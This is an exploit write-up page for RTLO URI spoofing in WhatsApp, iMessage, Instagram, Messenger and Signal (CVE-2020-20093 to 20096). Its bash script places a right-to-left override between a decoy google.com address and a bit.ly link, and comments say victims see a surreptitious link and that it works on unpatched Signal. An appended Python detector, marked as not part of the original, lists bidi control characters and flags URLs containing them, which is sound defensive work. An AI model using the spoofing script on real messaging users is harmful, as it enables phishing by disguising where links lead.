Published on March 27th, 2022

RTLO Injection URI Spoofing – Torchsec



# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: Whatsapp iOS
# Version 2.19.80 and below
# Tested on: Whatsapp Android
# Version 2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram iOS Android 107.0.0.11
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096

#!/bin/bash
# Author: sickcodes
# Contact: https://twitter.com/sickcodes https://github.com/sickcodes
# Copyright: sickcodes (C) 2022
# License: GPLv3+

# References: https://github.com/zadewg/RIUS
# https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
# https://sick.codes/sick-2022-40

APPEAR_AS='https://google.com'

DESTINATION='bit.ly/3ixIRwm'





printf "\n\n${APPEAR_AS}/\u202E${DESTINATION}\n\n"

# copy paste into any of the above apps.
# victim will see a surreptitious link

# works on latest Signal (unpatched)
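
A defensive check for the technique above, as an added example that is not part of the original advisory or the authors' script: it flags URL-like tokens that embed bidirectional control characters such as U+202E and returns an escaped form that is safe to log or show in a warning. The function names, the URL pattern and the sample message are assumptions constructed for illustration.

```python
import re
import unicodedata

# Bidirectional formatting controls that change display order without
# changing the underlying (logical) character order a URL parser sees.
BIDI_CONTROLS = frozenset(
    "\u061c\u200e\u200f"              # ALM, LRM, RLM
    "\u202a\u202b\u202c\u202d\u202e"  # LRE, RLE, PDF, LRO, RLO
    "\u2066\u2067\u2068\u2069"        # LRI, RLI, FSI, PDI
)

# Assumed, deliberately loose pattern for URL-like tokens in chat text.
URL_RE = re.compile(r"(?:https?://|www\.)\S+", re.IGNORECASE)


def escape_bidi(text):
    """Make bidi controls visible, e.g. for logs or a warning dialog."""
    return "".join(f"<U+{ord(c):04X}>" if c in BIDI_CONTROLS else c for c in text)


def strip_bidi(text):
    """Drop bidi controls so Latin-script link text renders in logical order."""
    return "".join(c for c in text if c not in BIDI_CONTROLS)


def find_bidi_urls(message):
    """Return one finding per URL-like token that embeds a bidi control."""
    findings = []
    for match in URL_RE.finditer(message):
        token = match.group(0)
        controls = [c for c in token if c in BIDI_CONTROLS]
        if controls:
            findings.append({
                "offset": match.start(),
                "controls": [f"U+{ord(c):04X} {unicodedata.name(c)}" for c in controls],
                "escaped": escape_bidi(token),
                "stripped": strip_bidi(token),
            })
    return findings


# Constructed sample message (example.com / example.org are placeholders).
SAMPLE = "Check this: https://example.com/\u202etxt.eton/gro.elpmaxe now"

if __name__ == "__main__":
    for finding in find_bidi_urls(SAMPLE):
        print(finding)
```

A message pipeline can call `find_bidi_urls` before linkifying text and either reject the message or render the `escaped` form instead of the raw token.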


